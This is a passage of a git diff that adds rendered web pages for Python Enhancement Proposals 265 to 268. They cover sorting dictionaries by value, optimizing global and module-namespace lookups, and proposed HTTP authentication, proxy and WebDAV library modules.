Also, Python 2.5’s heapq.nlargest() function addresses the common use +case of finding only a few of the highest valued items:

+
>>> nlargest(2, d.iteritems(), itemgetter(1))
+[('b', 23), ('d', 17)]
+
+
+
+
+

Motivation

+

A common use of dictionaries is to count occurrences by setting +the value of d[key] to 1 on its first occurrence, then increment +the value on each subsequent occurrence. This can be done several +different ways, but the get() method is the most succinct:

+
d[key] = d.get(key, 0) + 1
+
+
+

Once all occurrences have been counted, a common use of the +resulting dictionary is to print the occurrences in +occurrence-sorted order, often with the largest value first.

+

This leads to a need to sort a dictionary’s items by value. The +canonical method of doing so in Python is to first use d.items() +to get a list of the dictionary’s items, then invert the ordering +of each item’s tuple from (key, value) into (value, key), then +sort the list; since Python sorts the list based on the first item +of the tuple, the list of (inverted) items is therefore sorted by +value. If desired, the list can then be reversed, and the tuples +can be re-inverted back to (key, value). (However, in my +experience, the inverted tuple ordering is fine for most purposes, +e.g. printing out the list.)

+

For example, given an occurrence count of:

+
>>> d = {'a':2, 'b':23, 'c':5, 'd':17, 'e':1}
+
+
+

we might do:

+
>>> items = [(v, k) for k, v in d.items()]
+>>> items.sort()
+>>> items.reverse()             # so largest is first
+>>> items = [(k, v) for v, k in items]
+
+
+

resulting in:

+
>>> items
+[('b', 23), ('d', 17), ('c', 5), ('a', 2), ('e', 1)]
+
+
+

which shows the list in by-value order, largest first. (In this +case, 'b' was found to have the most occurrences.)

+

This works fine, but is “hard to use” in two aspects. First, +although this idiom is known to veteran Pythoneers, it is not at +all obvious to newbies – either in terms of its algorithm +(inverting the ordering of item tuples) or its implementation +(using list comprehensions – which are an advanced Python +feature.) Second, it requires having to repeatedly type a lot of +“grunge”, resulting in both tedium and mistakes.

+

We therefore would rather Python provide a method of sorting +dictionaries by value which would be both easy for newbies to +understand (or, better yet, not to have to understand) and +easier for all to use.

+
+
+

Rationale

+

As Tim Peters has pointed out, this sort of thing brings on the +problem of trying to be all things to all people. Therefore, we +will limit its scope to try to hit “the sweet spot”. Unusual +cases (e.g. sorting via a custom comparison function) can, of +course, be handled “manually” using present methods.

+

Here are some simple possibilities:

+

The items() method of dictionaries can be augmented with new +parameters having default values that provide for full +backwards-compatibility:

+
(1) items(sort_by_values=0, reversed=0)
+
+
+

or maybe just:

+
(2) items(sort_by_values=0)
+
+
+

since reversing a list is easy enough.

+

Alternatively, items() could simply let us control the (key, value) +order:

+
(3) items(values_first=0)
+
+
+

Again, this is fully backwards-compatible. It does less work than +the others, but it at least eases the most complicated/tricky part +of the sort-by-value problem: inverting the order of item tuples. +Using this is very simple:

+
items = d.items(1)
+items.sort()
+items.reverse()         # (if desired)
+
+
+

The primary drawback of the preceding three approaches is the +additional overhead for the parameter-less items() case, due to +having to process default parameters. (However, if one assumes +that items() gets used primarily for creating sort-by-value lists, +this is not really a drawback in practice.)

+

Alternatively, we might add a new dictionary method which somehow +embodies “sorting”. This approach offers two advantages. First, +it avoids adding overhead to the items() method. Second, it is +perhaps more accessible to newbies: when they go looking for a +method for sorting dictionaries, they hopefully run into this one, +and they will not have to understand the finer points of tuple +inversion and list sorting to achieve sort-by-value.

+

To allow the four basic possibilities of sorting by key/value and in +forward/reverse order, we could add this method:

+
(4) sorted_items(by_value=0, reversed=0)
+
+
+

I believe the most common case would actually be by_value=1, +reversed=1, but the defaults values given here might lead to +fewer surprises by users: sorted_items() would be the same as +items() followed by sort().

+

Finally (as a last resort), we could use:

+
(5) items_sorted_by_value(reversed=0)
+
+
+
+
+

Implementation

+

The proposed dictionary methods would necessarily be implemented +in C. Presumably, the implementation would be fairly simple since +it involves just adding a few calls to Python’s existing +machinery.

+
+
+

Concerns

+

Aside from the run-time overhead already addressed in +possibilities 1 through 3, concerns with this proposal probably +will fall into the categories of “feature bloat” and/or “code +bloat”. However, I believe that several of the suggestions made +here will result in quite minimal bloat, resulting in a good +tradeoff between bloat and “value added”.

+

Tim Peters has noted that implementing this in C might not be +significantly faster than implementing it in Python today. +However, the major benefits intended here are “accessibility” and +“ease of use”, not “speed”. Therefore, as long as it is not +noticeably slower (in the case of plain items(), speed need not be +a consideration.

+
+
+

References

+

A related thread called “counting occurrences” appeared on +comp.lang.python in August, 2001. This included examples of +approaches to systematizing the sort-by-value problem by +implementing it as reusable Python functions and classes.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0265.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0266/index.html b/pep-0266/index.html new file mode 100644 index 00000000000..9f76151c19d --- /dev/null +++ b/pep-0266/index.html @@ -0,0 +1,554 @@ + + + + + + + + PEP 266 – Optimizing Global Variable/Attribute Access | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 266 – Optimizing Global Variable/Attribute Access

+
+
Author:
+
Skip Montanaro <skip at pobox.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
13-Aug-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The bindings for most global variables and attributes of other modules +typically never change during the execution of a Python program, but because +of Python’s dynamic nature, code which accesses such global objects must run +through a full lookup each time the object is needed. This PEP proposes a +mechanism that allows code that accesses most global objects to treat them as +local objects and places the burden of updating references on the code that +changes the name bindings of such objects.

+
+
+

Introduction

+

Consider the workhorse function sre_compile._compile. It is the internal +compilation function for the sre module. It consists almost entirely of a +loop over the elements of the pattern being compiled, comparing opcodes with +known constant values and appending tokens to an output list. Most of the +comparisons are with constants imported from the sre_constants module. +This means there are lots of LOAD_GLOBAL bytecodes in the compiled output +of this module. Just by reading the code it’s apparent that the author +intended LITERAL, NOT_LITERAL, OPCODES and many other symbols to +be constants. Still, each time they are involved in an expression, they must +be looked up anew.

+

Most global accesses are actually to objects that are “almost constants”. +This includes global variables in the current module as well as the attributes +of other imported modules. Since they rarely change, it seems reasonable to +place the burden of updating references to such objects on the code that +changes the name bindings. If sre_constants.LITERAL is changed to refer +to another object, perhaps it would be worthwhile for the code that modifies +the sre_constants module dict to correct any active references to that +object. By doing so, in many cases global variables and the attributes of +many objects could be cached as local variables. If the bindings between the +names given to the objects and the objects themselves changes rarely, the cost +of keeping track of such objects should be low and the potential payoff fairly +large.

+

In an attempt to gauge the effect of this proposal, I modified the Pystone +benchmark program included in the Python distribution to cache global +functions. Its main function, Proc0, makes calls to ten different +functions inside its for loop. In addition, Func2 calls Func1 +repeatedly inside a loop. If local copies of these 11 global identifiers are +made before the functions’ loops are entered, performance on this particular +benchmark improves by about two percent (from 5561 pystones to 5685 on my +laptop). It gives some indication that performance would be improved by +caching most global variable access. Note also that the pystone benchmark +makes essentially no accesses of global module attributes, an anticipated area +of improvement for this PEP.

+
+
+

Proposed Change

+

I propose that the Python virtual machine be modified to include +TRACK_OBJECT and UNTRACK_OBJECT opcodes. TRACK_OBJECT would +associate a global name or attribute of a global name with a slot in the local +variable array and perform an initial lookup of the associated object to fill +in the slot with a valid value. The association it creates would be noted by +the code responsible for changing the name-to-object binding to cause the +associated local variable to be updated. The UNTRACK_OBJECT opcode would +delete any association between the name and the local variable slot.

+
+
+

Threads

+

Operation of this code in threaded programs will be no different than in +unthreaded programs. If you need to lock an object to access it, you would +have had to do that before TRACK_OBJECT would have been executed and +retain that lock until after you stop using it.

+

FIXME: I suspect I need more here.

+
+
+

Rationale

+

Global variables and attributes rarely change. For example, once a function +imports the math module, the binding between the name math and the +module it refers to aren’t likely to change. Similarly, if the function that +uses the math module refers to its sin attribute, it’s unlikely to +change. Still, every time the module wants to call the math.sin function, +it must first execute a pair of instructions:

+
LOAD_GLOBAL     math
+LOAD_ATTR       sin
+
+
+

If the client module always assumed that math.sin was a local constant and +it was the responsibility of “external forces” outside the function to keep +the reference correct, we might have code like this:

+
TRACK_OBJECT       math.sin
+...
+LOAD_FAST          math.sin
+...
+UNTRACK_OBJECT     math.sin
+
+
+

If the LOAD_FAST was in a loop the payoff in reduced global loads and +attribute lookups could be significant.

+

This technique could, in theory, be applied to any global variable access or +attribute lookup. Consider this code:

+
l = []
+for i in range(10):
+    l.append(math.sin(i))
+return l
+
+
+

Even though l is a local variable, you still pay the cost of loading +l.append ten times in the loop. The compiler (or an optimizer) could +recognize that both math.sin and l.append are being called in the loop +and decide to generate the tracked local code, avoiding it for the builtin +range() function because it’s only called once during loop setup. +Performance issues related to accessing local variables make tracking +l.append less attractive than tracking globals such as math.sin.

+

According to a post to python-dev by Marc-Andre Lemburg [1], LOAD_GLOBAL +opcodes account for over 7% of all instructions executed by the Python virtual +machine. This can be a very expensive instruction, at least relative to a +LOAD_FAST instruction, which is a simple array index and requires no extra +function calls by the virtual machine. I believe many LOAD_GLOBAL +instructions and LOAD_GLOBAL/LOAD_ATTR pairs could be converted to +LOAD_FAST instructions.

+

Code that uses global variables heavily often resorts to various tricks to +avoid global variable and attribute lookup. The aforementioned +sre_compile._compile function caches the append method of the growing +output list. Many people commonly abuse functions’ default argument feature +to cache global variable lookups. Both of these schemes are hackish and +rarely address all the available opportunities for optimization. (For +example, sre_compile._compile does not cache the two globals that it uses +most frequently: the builtin len function and the global OPCODES array +that it imports from sre_constants.py.

+
+
+

Questions

+
+

What about threads? What if math.sin changes while in cache?

+

I believe the global interpreter lock will protect values from being +corrupted. In any case, the situation would be no worse than it is today. +If one thread modified math.sin after another thread had already executed +LOAD_GLOBAL math, but before it executed LOAD_ATTR sin, the client +thread would see the old value of math.sin.

+

The idea is this. I use a multi-attribute load below as an example, not +because it would happen very often, but because by demonstrating the recursive +nature with an extra call hopefully it will become clearer what I have in +mind. Suppose a function defined in module foo wants to access +spam.eggs.ham and that spam is a module imported at the module level +in foo:

+
import spam
+...
+def somefunc():
+...
+x = spam.eggs.ham
+
+
+

Upon entry to somefunc, a TRACK_GLOBAL instruction will be executed:

+
TRACK_GLOBAL spam.eggs.ham n
+
+
+

spam.eggs.ham is a string literal stored in the function’s constants +array. n is a fastlocals index. &fastlocals[n] is a reference to +slot n in the executing frame’s fastlocals array, the location in +which the spam.eggs.ham reference will be stored. Here’s what I envision +happening:

+
    +
  1. The TRACK_GLOBAL instruction locates the object referred to by the name +spam and finds it in its module scope. It then executes a C function +like:
    _PyObject_TrackName(m, "spam.eggs.ham", &fastlocals[n])
    +
    +
    +

    where m is the module object with an attribute spam.

    +
  2. +
  3. The module object strips the leading spam. and stores the necessary +information (eggs.ham and &fastlocals[n]) in case its binding for the +name eggs changes. It then locates the object referred to by the key +eggs in its dict and recursively calls:
    _PyObject_TrackName(eggs, "eggs.ham", &fastlocals[n])
    +
    +
    +
  4. +
  5. The eggs object strips the leading eggs., stores the +(ham, &fastlocals[n]) info, locates the object in its namespace called +ham and calls _PyObject_TrackName once again:
    _PyObject_TrackName(ham, "ham", &fastlocals[n])
    +
    +
    +
  6. +
  7. The ham object strips the leading string (no “.” this time, but that’s +a minor point), sees that the result is empty, then uses its own value +(self, probably) to update the location it was handed:
    Py_XDECREF(&fastlocals[n]);
    +&fastlocals[n] = self;
    +Py_INCREF(&fastlocals[n]);
    +
    +
    +

    At this point, each object involved in resolving spam.eggs.ham +knows which entry in its namespace needs to be tracked and what location +to update if that name changes. Furthermore, if the one name it is +tracking in its local storage changes, it can call _PyObject_TrackName +using the new object once the change has been made. At the bottom end of +the food chain, the last object will always strip a name, see the empty +string and know that its value should be stuffed into the location it’s +been passed.

    +

    When the object referred to by the dotted expression spam.eggs.ham +is going to go out of scope, an UNTRACK_GLOBAL spam.eggs.ham n +instruction is executed. It has the effect of deleting all the tracking +information that TRACK_GLOBAL established.

    +

    The tracking operation may seem expensive, but recall that the objects +being tracked are assumed to be “almost constant”, so the setup cost will +be traded off against hopefully multiple local instead of global loads. +For globals with attributes the tracking setup cost grows but is offset by +avoiding the extra LOAD_ATTR cost. The TRACK_GLOBAL instruction +needs to perform a PyDict_GetItemString for the first name in the chain +to determine where the top-level object resides. Each object in the chain +has to store a string and an address somewhere, probably in a dict that +uses storage locations as keys (e.g. the &fastlocals[n]) and strings as +values. (This dict could possibly be a central dict of dicts whose keys +are object addresses instead of a per-object dict.) It shouldn’t be the +other way around because multiple active frames may want to track +spam.eggs.ham, but only one frame will want to associate that name with +one of its fast locals slots.

    +
  8. +
+
+
+
+

Unresolved Issues

+
+

Threading

+

What about this (dumb) code?:

+
l = []
+lock = threading.Lock()
+...
+def fill_l()::
+   for i in range(1000)::
+      lock.acquire()
+      l.append(math.sin(i))
+      lock.release()
+...
+def consume_l()::
+   while 1::
+      lock.acquire()
+      if l::
+         elt = l.pop()
+      lock.release()
+      fiddle(elt)
+
+
+

It’s not clear from a static analysis of the code what the lock is protecting. +(You can’t tell at compile-time that threads are even involved can you?) +Would or should it affect attempts to track l.append or math.sin in +the fill_l function?

+

If we annotate the code with mythical track_object and untrack_object +builtins (I’m not proposing this, just illustrating where stuff would go!), we +get:

+
l = []
+lock = threading.Lock()
+...
+def fill_l()::
+   track_object("l.append", append)
+   track_object("math.sin", sin)
+   for i in range(1000)::
+      lock.acquire()
+      append(sin(i))
+      lock.release()
+   untrack_object("math.sin", sin)
+   untrack_object("l.append", append)
+...
+def consume_l()::
+   while 1::
+      lock.acquire()
+      if l::
+         elt = l.pop()
+      lock.release()
+      fiddle(elt)
+
+
+

Is that correct both with and without threads (or at least equally incorrect +with and without threads)?

+
+
+

Nested Scopes

+

The presence of nested scopes will affect where TRACK_GLOBAL finds a +global variable, but shouldn’t affect anything after that. (I think.)

+
+
+

Missing Attributes

+

Suppose I am tracking the object referred to by spam.eggs.ham and +spam.eggs is rebound to an object that does not have a ham attribute. +It’s clear this will be an AttributeError if the programmer attempts to +resolve spam.eggs.ham in the current Python virtual machine, but suppose +the programmer has anticipated this case:

+
if hasattr(spam.eggs, "ham"):
+    print spam.eggs.ham
+elif hasattr(spam.eggs, "bacon"):
+    print spam.eggs.bacon
+else:
+    print "what? no meat?"
+
+
+

You can’t raise an AttributeError when the tracking information is +recalculated. If it does not raise AttributeError and instead lets the +tracking stand, it may be setting the programmer up for a very subtle error.

+

One solution to this problem would be to track the shortest possible root of +each dotted expression the function refers to directly. In the above example, +spam.eggs would be tracked, but spam.eggs.ham and spam.eggs.bacon +would not.

+
+
+

Who does the dirty work?

+

In the Questions section I postulated the existence of a +_PyObject_TrackName function. While the API is fairly easy to specify, +the implementation behind-the-scenes is not so obvious. A central dictionary +could be used to track the name/location mappings, but it appears that all +setattr functions might need to be modified to accommodate this new +functionality.

+

If all types used the PyObject_GenericSetAttr function to set attributes +that would localize the update code somewhat. They don’t however (which is +not too surprising), so it seems that all getattrfunc and getattrofunc +functions will have to be updated. In addition, this would place an absolute +requirement on C extension module authors to call some function when an +attribute changes value (PyObject_TrackUpdate?).

+

Finally, it’s quite possible that some attributes will be set by side effect +and not by any direct call to a setattr method of some sort. Consider a +device interface module that has an interrupt routine that copies the contents +of a device register into a slot in the object’s struct whenever it +changes. In these situations, more extensive modifications would have to be +made by the module author. To identify such situations at compile time would +be impossible. I think an extra slot could be added to PyTypeObjects to +indicate if an object’s code is safe for global tracking. It would have a +default value of 0 (Py_TRACKING_NOT_SAFE). If an extension module author +has implemented the necessary tracking support, that field could be +initialized to 1 (Py_TRACKING_SAFE). _PyObject_TrackName could check +that field and issue a warning if it is asked to track an object that the +author has not explicitly said was safe for tracking.

+
+
+
+

Discussion

+

Jeremy Hylton has an alternate proposal on the table [2]. His proposal seeks +to create a hybrid dictionary/list object for use in global name lookups that +would make global variable access look more like local variable access. While +there is no C code available to examine, the Python implementation given in +his proposal still appears to require dictionary key lookup. It doesn’t +appear that his proposal could speed local variable attribute lookup, which +might be worthwhile in some situations if potential performance burdens could +be addressed.

+
+
+

Backwards Compatibility

+

I don’t believe there will be any serious issues of backward compatibility. +Obviously, Python bytecode that contains TRACK_OBJECT opcodes could not be +executed by earlier versions of the interpreter, but breakage at the bytecode +level is often assumed between versions.

+
+
+

Implementation

+

TBD. This is where I need help. I believe there should be either a central +name/location registry or the code that modifies object attributes should be +modified, but I’m not sure the best way to go about this. If you look at the +code that implements the STORE_GLOBAL and STORE_ATTR opcodes, it seems +likely that some changes will be required to PyDict_SetItem and +PyObject_SetAttr or their String variants. Ideally, there’d be a fairly +central place to localize these changes. If you begin considering tracking +attributes of local variables you get into issues of modifying STORE_FAST +as well, which could be a problem, since the name bindings for local variables +are changed much more frequently. (I think an optimizer could avoid inserting +the tracking code for the attributes for any local variables where the +variable’s name binding changes.)

+
+
+

Performance

+

I believe (though I have no code to prove it at this point), that implementing +TRACK_OBJECT will generally not be much more expensive than a single +LOAD_GLOBAL instruction or a LOAD_GLOBAL/LOAD_ATTR pair. An +optimizer should be able to avoid converting LOAD_GLOBAL and +LOAD_GLOBAL/LOAD_ATTR to the new scheme unless the object access +occurred within a loop. Further down the line, a register-oriented +replacement for the current Python virtual machine [3] could conceivably +eliminate most of the LOAD_FAST instructions as well.

+

The number of tracked objects should be relatively small. All active frames +of all active threads could conceivably be tracking objects, but this seems +small compared to the number of functions defined in a given application.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0266.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0267/index.html b/pep-0267/index.html new file mode 100644 index 00000000000..529aed3e6ef --- /dev/null +++ b/pep-0267/index.html @@ -0,0 +1,386 @@ + + + + + + + + PEP 267 – Optimized Access to Module Namespaces | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 267 – Optimized Access to Module Namespaces

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
23-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Deferral

+

While this PEP is a nice idea, no-one has yet emerged to do the work of +hashing out the differences between this PEP, PEP 266 and PEP 280. +Hence, it is being deferred.

+
+
+

Abstract

+

This PEP proposes a new implementation of global module namespaces +and the builtin namespace that speeds name resolution. The +implementation would use an array of object pointers for most +operations in these namespaces. The compiler would assign indices +for global variables and module attributes at compile time.

+

The current implementation represents these namespaces as +dictionaries. A global name incurs a dictionary lookup each time +it is used; a builtin name incurs two dictionary lookups, a failed +lookup in the global namespace and a second lookup in the builtin +namespace.

+

This implementation should speed Python code that uses +module-level functions and variables. It should also eliminate +awkward coding styles that have evolved to speed access to these +names.

+

The implementation is complicated because the global and builtin +namespaces can be modified dynamically in ways that are impossible +for the compiler to detect. (Example: A module’s namespace is +modified by a script after the module is imported.) As a result, +the implementation must maintain several auxiliary data structures +to preserve these dynamic features.

+
+
+

Introduction

+

This PEP proposes a new implementation of attribute access for +module objects that optimizes access to module variables known at +compile time. The module will store these variables in an array +and provide an interface to lookup attributes using array offsets. +For globals, builtins, and attributes of imported modules, the +compiler will generate code that uses the array offsets for fast +access.

+

[describe the key parts of the design: dlict, compiler support, +stupid name trick workarounds, optimization of other module’s +globals]

+

The implementation will preserve existing semantics for module +namespaces, including the ability to modify module namespaces at +runtime in ways that affect the visibility of builtin names.

+
+
+

DLict design

+

The namespaces are implemented using a data structure that has +sometimes gone under the name dlict. It is a dictionary that has +numbered slots for some dictionary entries. The type must be +implemented in C to achieve acceptable performance. The new +type-class unification work should make this fairly easy. The +DLict will presumably be a subclass of dictionary with an +alternate storage module for some keys.

+

A Python implementation is included here to illustrate the basic +design:

+
"""A dictionary-list hybrid"""
+
+import types
+
+class DLict:
+    def __init__(self, names):
+        assert isinstance(names, types.DictType)
+        self.names = {}
+        self.list = [None] * size
+        self.empty = [1] * size
+        self.dict = {}
+        self.size = 0
+
+    def __getitem__(self, name):
+        i = self.names.get(name)
+        if i is None:
+            return self.dict[name]
+        if self.empty[i] is not None:
+            raise KeyError, name
+        return self.list[i]
+
+    def __setitem__(self, name, val):
+        i = self.names.get(name)
+        if i is None:
+            self.dict[name] = val
+        else:
+            self.empty[i] = None
+            self.list[i] = val
+            self.size += 1
+
+    def __delitem__(self, name):
+        i = self.names.get(name)
+        if i is None:
+            del self.dict[name]
+        else:
+            if self.empty[i] is not None:
+                raise KeyError, name
+            self.empty[i] = 1
+            self.list[i] = None
+            self.size -= 1
+
+    def keys(self):
+        if self.dict:
+            return self.names.keys() + self.dict.keys()
+        else:
+            return self.names.keys()
+
+    def values(self):
+        if self.dict:
+            return self.names.values() + self.dict.values()
+        else:
+            return self.names.values()
+
+    def items(self):
+        if self.dict:
+            return self.names.items()
+        else:
+            return self.names.items() + self.dict.items()
+
+    def __len__(self):
+        return self.size + len(self.dict)
+
+    def __cmp__(self, dlict):
+        c = cmp(self.names, dlict.names)
+        if c != 0:
+            return c
+        c = cmp(self.size, dlict.size)
+        if c != 0:
+            return c
+        for i in range(len(self.names)):
+            c = cmp(self.empty[i], dlict.empty[i])
+        if c != 0:
+            return c
+        if self.empty[i] is None:
+            c = cmp(self.list[i], dlict.empty[i])
+            if c != 0:
+                return c
+        return cmp(self.dict, dlict.dict)
+
+    def clear(self):
+        self.dict.clear()
+        for i in range(len(self.names)):
+            if self.empty[i] is None:
+                self.empty[i] = 1
+                self.list[i] = None
+
+    def update(self):
+        pass
+
+    def load(self, index):
+        """dlict-special method to support indexed access"""
+        if self.empty[index] is None:
+            return self.list[index]
+        else:
+            raise KeyError, index # XXX might want reverse mapping
+
+    def store(self, index, val):
+        """dlict-special method to support indexed access"""
+        self.empty[index] = None
+        self.list[index] = val
+
+    def delete(self, index):
+        """dlict-special method to support indexed access"""
+        self.empty[index] = 1
+        self.list[index] = None
+
+
+
+
+

Compiler issues

+

The compiler currently collects the names of all global variables +in a module. These are names bound at the module level or bound +in a class or function body that declares them to be global.

+

The compiler would assign indices for each global name and add the +names and indices of the globals to the module’s code object. +Each code object would then be bound irrevocably to the module it +was defined in. (Not sure if there are some subtle problems with +this.)

+

For attributes of imported modules, the module will store an +indirection record. Internally, the module will store a pointer +to the defining module and the offset of the attribute in the +defining module’s global variable array. The offset would be +initialized the first time the name is looked up.

+
+
+

Runtime model

+

The PythonVM will be extended with new opcodes to access globals +and module attributes via a module-level array.

+

A function object would need to point to the module that defined +it in order to provide access to the module-level global array.

+

For module attributes stored in the dlict (call them static +attributes), the get/delattr implementation would need to track +access to these attributes using the old by-name interface. If a +static attribute is updated dynamically, e.g.:

+
mod.__dict__["foo"] = 2
+
+
+

The implementation would need to update the array slot instead of +the backup dict.

+
+
+

Backwards compatibility

+

The dlict will need to maintain meta-information about whether a +slot is currently used or not. It will also need to maintain a +pointer to the builtin namespace. When a name is not currently +used in the global namespace, the lookup will have to fail over to +the builtin namespace.

+

In the reverse case, each module may need a special accessor +function for the builtin namespace that checks to see if a global +shadowing the builtin has been added dynamically. This check +would only occur if there was a dynamic change to the module’s +dlict, i.e. when a name is bound that wasn’t discovered at +compile-time.

+

These mechanisms would have little if any cost for the common case +whether a module’s global namespace is not modified in strange +ways at runtime. They would add overhead for modules that did +unusual things with global names, but this is an uncommon practice +and probably one worth discouraging.

+

It may be desirable to disable dynamic additions to the global +namespace in some future version of Python. If so, the new +implementation could provide warnings.

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0267.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0268/index.html b/pep-0268/index.html new file mode 100644 index 00000000000..84621400aa7 --- /dev/null +++ b/pep-0268/index.html @@ -0,0 +1,304 @@ + + + + + + + + PEP 268 – Extended HTTP functionality and WebDAV | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 268 – Extended HTTP functionality and WebDAV

+
+
Author:
+
Greg Stein <gstein at lyra.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Aug-2001
+
Python-Version:
+
2.x
+
Post-History:
+
21-Aug-2001
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. It has failed to generate sufficient +community support in the six years since its proposal.

+
+
+

Abstract

+

This PEP discusses new modules and extended functionality for Python’s +HTTP support. Notably, the addition of authenticated requests, proxy +support, authenticated proxy usage, and WebDAV capabilities.

+
+
+

Rationale

+

Python has been quite popular as a result of its “batteries included” +positioning. One of the most heavily used protocols, HTTP (see +RFC 2616), has been included with Python for years (httplib). However, +this support has not kept up with the full needs and requirements of +many HTTP-based applications and systems. In addition, new protocols +based on HTTP, such as WebDAV and XML-RPC, are becoming useful and are +seeing increasing usage. Supplying this functionality meets Python’s +“batteries included” role and also keeps Python at the leading edge of +new technologies.

+

While authentication and proxy support are two very notable features +missing from Python’s core HTTP processing, they are minimally handled +as part of Python’s URL handling (urllib and +urllib2). However, applications that need fine-grained or +sophisticated HTTP handling cannot make use of the features while they +reside in urllib. Refactoring these features into a location where +they can be directly associated with an HTTP connection will improve +their utility for both urllib and for sophisticated applications.

+

The motivation for this PEP was from several people requesting these +features directly, and from a number of feature requests on +SourceForge. Since the exact form of the modules to be provided and +the classes/architecture used could be subject to debate, this PEP was +created to provide a focal point for those discussions.

+
+
+

Specification

+

Two modules will be added to the standard library: httpx (HTTP +extended functionality), and davlib (WebDAV library).

+

[ suggestions for module names are welcome; davlib has some +precedence, but something like webdav might be desirable ]

+
+

HTTP Authentication

+

The httpx module will provide a mixin for performing HTTP +authentication (for both proxy and origin server authentication). This +mixin (httpx.HandleAuthentication) can be combined with the +HTTPConnection and the HTTPSConnection classes (the mixin may +possibly work with the HTTP and HTTPS compatibility classes, but that +is not a requirement).

+

The mixin will delegate the authentication process to one or more +“authenticator” objects, allowing multiple connections to share +authenticators. The use of a separate object allows for a long term +connection to an authentication system (e.g. LDAP). An authenticator +for the Basic and Digest mechanisms (see RFC 2617) will be +provided. User-supplied authenticator subclasses can be registered and +used by the connections.

+

A “credentials” object (httpx.Credentials) is also associated with +the mixin, and stores the credentials (e.g. username and password) +needed by the authenticators. Subclasses of Credentials can be created +to hold additional information (e.g. NT domain).

+

The mixin overrides the getresponse() method to detect 401 +(Unauthorized) and 407 (Proxy Authentication Required) +responses. When this is found, the response object, the connection, +and the credentials are passed to the authenticator corresponding with +the authentication scheme specified in the response (multiple +authenticators are tried in decreasing order of security if multiple +schemes are in the response). Each authenticator can examine the +response headers and decide whether and how to resend the request with +the correct authentication headers. If no authenticator can +successfully handle the authentication, then an exception is raised.

+

Resending a request, with the appropriate credentials, is one of the +more difficult portions of the authentication system. The difficulty +arises in recording what was sent originally: the request line, the +headers, and the body. By overriding putrequest, putheader, and +endheaders, we can capture all but the body. Once the endheaders +method is called, then we capture all calls to send() (until the next +putrequest method call) to hold the body content. The mixin will have +a configurable limit for the amount of data to hold in this fashion +(e.g. only hold up to 100k of body content). Assuming that the entire +body has been stored, then we can resend the request with the +appropriate authentication information.

+

If the body is too large to be stored, then the getresponse() +simply returns the response object, indicating the 401 or 407 +error. Since the authentication information has been computed and +cached (into the Credentials object; see below), the caller can simply +regenerate the request. The mixin will attach the appropriate +credentials.

+

A “protection space” (see RFC 2617, section 1.2) is defined as a tuple +of the host, port, and authentication realm. When a request is +initially sent to an HTTP server, we do not know the authentication +realm (the realm is only returned when authentication fails). However, +we do have the path from the URL, and that can be useful in +determining the credentials to send to the server. The Basic +authentication scheme is typically set up hierarchically: the +credentials for /path can be tried for /path/subpath. The +Digest authentication scheme has explicit support for the hierarchical +setup. The httpx.Credentials object will store credentials for +multiple protection spaces, and can be looked up in two different +ways:

+
    +
  1. looked up using (host, port, path) – this lookup scheme is +used when generating a request for a path where we don’t know the +authentication realm.
  2. +
  3. looked up using (host, port, realm) – this mechanism is used +during the authentication process when the server has specified that +the Request-URI resides within a specific realm.
  4. +
+

The HandleAuthentication mixin will override putrequest() to +automatically insert credentials, if available. The URL from the +putrequest is used to determine the appropriate authentication +information to use.

+

It is also important to note that two sets of credentials are used, +and stored by the mixin. One set for any proxy that may be used, and +one used for the target origin server. Since proxies do not have +paths, the protection spaces in the proxy credentials will always use +“/” for storing and looking up via a path.

+
+
+

Proxy Handling

+

The httpx module will provide a mixin for using a proxy to perform +HTTP(S) operations. This mixin (httpx.UseProxy) can be combined +with the HTTPConnection and the HTTPSConnection classes (the +mixin may possibly work with the HTTP and HTTPS compatibility classes, +but that is not a requirement).

+

The mixin will record the (host, port) of the proxy to use. XXX +will be overridden to use this host/port combination for connections +and to rewrite request URLs into the absoluteURIs referring to the +origin server (these URIs are passed to the proxy server).

+

Proxy authentication is handled by the httpx.HandleAuthentication +class since a user may directly use HTTP(S)Connection to speak +with proxies.

+
+
+

WebDAV Features

+

The davlib module will provide a mixin for sending WebDAV requests +to a WebDAV-enabled server. This mixin (davlib.DAVClient) can be +combined with the HTTPConnection and the HTTPSConnection +classes (the mixin may possibly work with the HTTP and HTTPS +compatibility classes, but that is not a requirement).

+

The mixin provides methods to perform the various HTTP methods defined +by HTTP in RFC 2616, and by WebDAV in RFC 2518.

+

A custom response object is used to decode 207 (Multi-Status) +responses. The response object will use the standard library’s xml +package to parse the multistatus XML information, producing a simple +structure of objects to hold the multistatus data. Multiple parsing +schemes will be tried/used, in order of decreasing speed.

+
+
+
+

Reference Implementation

+

The actual (future/final) implementation is being developed in the +/nondist/sandbox/Lib directory, until it is accepted and moved +into the main Lib directory.

+
+ +
+
+

